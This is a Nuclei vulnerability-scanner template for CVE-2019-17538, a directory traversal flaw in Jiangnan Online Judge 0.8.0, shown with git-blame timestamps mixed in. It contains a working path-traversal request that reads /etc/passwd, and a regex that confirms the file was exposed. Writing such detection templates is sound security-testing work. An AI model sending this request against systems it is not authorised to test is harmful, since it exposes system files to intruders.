nuclei-templates/cves/2019/CVE-2019-17538.yaml

30 lines
894 B
YAML
Raw Normal View History

id: CVE-2019-17538
info:
name: Jnoj Directory Traversal for file reading(LFI)
author: pussycat0x
2021-03-01 12:00:49 +00:00
severity: high
reference: https://github.com/shi-yang/jnoj/issues/53
2021-07-14 10:08:56 +00:00
tags: cve,cve2019,jnoj,lfi
2021-03-01 11:56:36 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2019-17538
cwe-id: CWE-22
description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring."
requests:
- raw:
- |
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
Content-Type: application/x-www-form-urlencoded
2021-03-01 11:56:36 +00:00
matchers-condition: and
matchers:
- type: status
status:
2021-03-01 11:56:36 +00:00
- 200
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-03-01 11:56:36 +00:00
part: body